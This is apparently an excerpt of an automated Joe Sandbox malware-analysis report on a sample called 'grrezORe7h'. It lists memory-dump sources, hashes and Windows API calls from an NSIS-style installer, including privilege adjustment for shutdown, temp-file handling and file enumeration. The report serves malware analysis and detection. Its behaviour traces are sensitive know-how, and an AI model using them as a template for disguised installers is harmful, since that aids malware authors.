                                                                                                                      • Instruction Fuzzy Hash: 6DC0123E204601EB8A15DB54E44088EFBA3ABD4256B00882EB08C41A60C331D8659B42
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5eaf839644d46101b831b6fd9c6e49c04eea207608da68d285bf6cbe0064dd25
                                                                                                                      • Instruction ID: 146287cfcb4d1fe83a0db09705bfcc8782728782b27b55284b76a9179ac608ff
                                                                                                                      • Opcode Fuzzy Hash: 5eaf839644d46101b831b6fd9c6e49c04eea207608da68d285bf6cbe0064dd25
                                                                                                                      • Instruction Fuzzy Hash: D9C08C3026C3048FE240AA1DC984B6137ECEF85B04F0058E1F00C8B625CA22FC004704
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                                      • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                      • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                      • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                      • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                                      • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                                        • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                        • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                      • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                                      • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                                      • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                                      • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                                      • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                                      • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                                        • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                      • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                      • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                      • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                                      • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                                      • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                                      • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                                      • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                      • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                                      • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                      • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                      • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                      • API String ID: 3586999533-3972089011
                                                                                                                      • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                      • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                      • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                      • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                      • String ID: $M$N
                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                      • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                      • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                      • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                      • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$0oGp$LjGp$LjGp$LjGp$LjGp$LjGp$LjGp$LjGp$LjGp$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq
                                                                                                                      • API String ID: 0-1726458773
                                                                                                                      • Opcode ID: 4c92f61d007a41812e416334b8b432e4ba5b70d121570dd8580b1eb5ccd9937a
                                                                                                                      • Instruction ID: d816e803308e02d656b268a817fca57e40f0958c1aa009a41ab9467555aef9ea
                                                                                                                      • Opcode Fuzzy Hash: 4c92f61d007a41812e416334b8b432e4ba5b70d121570dd8580b1eb5ccd9937a
                                                                                                                      • Instruction Fuzzy Hash: 43327FB4E102288FDB54CF69C944BDDBBB2BF89301F1081A9D909A7361DB759E85CF50
                                                                                                                      APIs
                                                                                                                      • DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 0040586F
                                                                                                                      • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058B7
                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058DA
                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058E0
                                                                                                                      • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058F0
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2035342205-1173974218
                                                                                                                      • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                      • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                      • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                      • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$0oGp$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq
                                                                                                                      • API String ID: 0-642543003
                                                                                                                      • Opcode ID: 2cd742114876a18992dc6efb7eaf2ff71c227e6f29406380c4a0036ea1be8c59
                                                                                                                      • Instruction ID: aba6641a86caa47710fe95b2dc79eff2d92431783e023e927ec27f57ab3b6c01
                                                                                                                      • Opcode Fuzzy Hash: 2cd742114876a18992dc6efb7eaf2ff71c227e6f29406380c4a0036ea1be8c59
                                                                                                                      • Instruction Fuzzy Hash: 47029FB4E002188FDB54CF69C994BDDBBF2BB89301F2081A9D909A7361DB759E85CF50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .5|q$4mV4DmV4hmV4$B07
                                                                                                                      • API String ID: 0-4096949436
                                                                                                                      • Opcode ID: b6050315162c2d40925b1dd3f2b21ee054c39670ce630c11e6e3c741e0e6a8db
                                                                                                                      • Instruction ID: d1778d0bef906d0efd5042b38da7dbec1e89e97b79015a1ed4cc06fc13f5942a
                                                                                                                      • Opcode Fuzzy Hash: b6050315162c2d40925b1dd3f2b21ee054c39670ce630c11e6e3c741e0e6a8db
                                                                                                                      • Instruction Fuzzy Hash: 64528E74E01268CFDB65DF69C884BDDBBB2BB89301F1081EAD409A7255DB35AE81CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7e08889d2c8e7a6b6e216da2ba1cd8584dc5a9a00ee1b2e59aff0e3aed28fc47
                                                                                                                      • Instruction ID: 328241f8379d2c5a520ae674db5ddbefeb1ba13330959dcf8cc71cc761e3f0d9
                                                                                                                      • Opcode Fuzzy Hash: 7e08889d2c8e7a6b6e216da2ba1cd8584dc5a9a00ee1b2e59aff0e3aed28fc47
                                                                                                                      • Instruction Fuzzy Hash: 55C1C174E00258CFDB14DFA9C994B9DBBB2BF89301F2081AAD809AB355DB345E85CF51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ead210ddbca45e8d6e95948d3c7b63acfb0e3c71d10d7132f366b31723752c71
                                                                                                                      • Instruction ID: 4883f5f063f1db0e57a6b877f802a8e695e10ca9b42baacbc67d180e02f3a667
                                                                                                                      • Opcode Fuzzy Hash: ead210ddbca45e8d6e95948d3c7b63acfb0e3c71d10d7132f366b31723752c71
                                                                                                                      • Instruction Fuzzy Hash: 51C1C074E10218CFDB54DFA9C994B9DBBB2AF89301F1081AAD808AB355DB359E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7e22564c445e035cc98f1b8d5e831a700a9f19e2b6004ae7e8b9912bb7c89d8e
                                                                                                                      • Instruction ID: 146887cfdb8bdbf9a0c918260a8e20d8f15dec9be5fe30dfe6a4f1341b61efb6
                                                                                                                      • Opcode Fuzzy Hash: 7e22564c445e035cc98f1b8d5e831a700a9f19e2b6004ae7e8b9912bb7c89d8e
                                                                                                                      • Instruction Fuzzy Hash: BAC1C174E01218CFDB54DFA9C994B9DBBB2BF89301F2081AAD408AB355DB359E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 97be4bd51b65b95834c291f0bc909637f30233933d30326741f96c6c80feb2e3
                                                                                                                      • Instruction ID: b434d05b807d38caac46ff6c0340bd65fc342781ecbc41ff46bc92e7ff655fa9
                                                                                                                      • Opcode Fuzzy Hash: 97be4bd51b65b95834c291f0bc909637f30233933d30326741f96c6c80feb2e3
                                                                                                                      • Instruction Fuzzy Hash: 49C1C174E10218CFDB54DFA9C994B9DBBB2BF89301F2081AAD408AB355DB359E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3e1cfd3382828f78179af320f8fcb0831c0c86691b45cf35f5be898ca318e401
                                                                                                                      • Instruction ID: 4a405802e2a5d306bb85868100c7d529f2a14b4cc7a9003a4374fbee05101df7
                                                                                                                      • Opcode Fuzzy Hash: 3e1cfd3382828f78179af320f8fcb0831c0c86691b45cf35f5be898ca318e401
                                                                                                                      • Instruction Fuzzy Hash: 44C1C174E11218CFDB54DFA9C994B9DBBB2BF89301F1081AAD808AB355DB359E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cb1b3b6e2fbc72a57512cc8e71d2aae7e747abe2824e1ecd5e48013611771994
                                                                                                                      • Instruction ID: fdf086172c8827aa9901e0a98ca67755c4c1f7daf959f0aec31b74216976430b
                                                                                                                      • Opcode Fuzzy Hash: cb1b3b6e2fbc72a57512cc8e71d2aae7e747abe2824e1ecd5e48013611771994
                                                                                                                      • Instruction Fuzzy Hash: B5C1C274E00218CFDB54DFA9C994B9DBBB2AF89301F1081AAD809AB354DB359E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ed681a92378c947fe77b63601117fb36f7b6fbea2e104eae9e2c8a62a96ef355
                                                                                                                      • Instruction ID: 22331860872cade465a9f7bfd44cc81340032906c2aed94aebf5bd74a1cf71cc
                                                                                                                      • Opcode Fuzzy Hash: ed681a92378c947fe77b63601117fb36f7b6fbea2e104eae9e2c8a62a96ef355
                                                                                                                      • Instruction Fuzzy Hash: 97C1C174E10218CFDB54DFA9C994B9DBBB2AF89301F1081AAD808AB355DB359E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d64f703de97161a32034a385b23308171ef1c19922f952c1db1fb115a5c79425
                                                                                                                      • Instruction ID: 0efe497d42fc1d49c443ef8e3410ded9c4d34779c222c537b211dd825c84655f
                                                                                                                      • Opcode Fuzzy Hash: d64f703de97161a32034a385b23308171ef1c19922f952c1db1fb115a5c79425
                                                                                                                      • Instruction Fuzzy Hash: EAC1C274E11218CFDB54DFA9C994B9DBBB2BF89301F1081AAD808AB354DB359E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eda8aefd5d81048adc3e5f77fc6bdd69c67434a155417b89974b48b632444e2a
                                                                                                                      • Instruction ID: 04957d176448f62bdabe039c03ebf4d9d3963802dd45a5a9099a58b7936cec58
                                                                                                                      • Opcode Fuzzy Hash: eda8aefd5d81048adc3e5f77fc6bdd69c67434a155417b89974b48b632444e2a
                                                                                                                      • Instruction Fuzzy Hash: 6AC1B174E11218CFDB54DFA9C994B9DBBB2EF89301F1081AAD808AB355DB359E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2083cdb83c930759d72f8e9e45cc587c88e15efebdbe54b586a58dfaf6a802e1
                                                                                                                      • Instruction ID: ca1f6df44cb764ae44db2a205df8c27ff8a79c0bb8b5c9e3ccad0d39ed7c855b
                                                                                                                      • Opcode Fuzzy Hash: 2083cdb83c930759d72f8e9e45cc587c88e15efebdbe54b586a58dfaf6a802e1
                                                                                                                      • Instruction Fuzzy Hash: FEC1C274E01218CFDB54DFA9C994B9DBBB2BF89301F2091AAD408AB355DB345E85CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b8fe54ca363ea048cec58c15df490246069ae93f6615c42ff4607006db678a48
                                                                                                                      • Instruction ID: 0b7f389a5bbf77b4e9916441a85a4e5e8928e940be27021b6f86e6dd9d0ccd0f
                                                                                                                      • Opcode Fuzzy Hash: b8fe54ca363ea048cec58c15df490246069ae93f6615c42ff4607006db678a48
                                                                                                                      • Instruction Fuzzy Hash: 56C1C174E10218CFDB54DFA9C994B9DBBB2BF89301F1081AAD408AB355DB35AE85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e536aab79e1f0e18fd36d34d7de05e762821a6a505515f6e063f76bc3c4999d7
                                                                                                                      • Instruction ID: 99165f7e6789c0879be6158cd5aeae9afa5958cac380bae1bd26eeab481e6217
                                                                                                                      • Opcode Fuzzy Hash: e536aab79e1f0e18fd36d34d7de05e762821a6a505515f6e063f76bc3c4999d7
                                                                                                                      • Instruction Fuzzy Hash: 99C1C274E00218CFDB54DFA9C994B9DBBB2AF89301F1091AAD808AB354DB359E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1b66051642ce7d6d3ea27f1e04014da0848970d18289e4a3f0c1b73763afb427
                                                                                                                      • Instruction ID: 8ff10329dbf34130a051c9f551dfafdb3534b6e09b09f80d5e3d8e967d40acd0
                                                                                                                      • Opcode Fuzzy Hash: 1b66051642ce7d6d3ea27f1e04014da0848970d18289e4a3f0c1b73763afb427
                                                                                                                      • Instruction Fuzzy Hash: 28C1C174E00218CFDB54DFA9C994B9DBBB2BF89301F1081AAD808AB355DB355E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c382f454630fde6a96912079d144cea909ac5e901fa678ba1ae62f8a64f5cb51
                                                                                                                      • Instruction ID: 82e8d95da634c890c27f2ef1b76aff8ed7baadd5f908ec10928a1447bc867c15
                                                                                                                      • Opcode Fuzzy Hash: c382f454630fde6a96912079d144cea909ac5e901fa678ba1ae62f8a64f5cb51
                                                                                                                      • Instruction Fuzzy Hash: EEC1C174E10218CFDB54DFA9C994B9DBBB2BF89301F1081AAD408AB355DB359E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
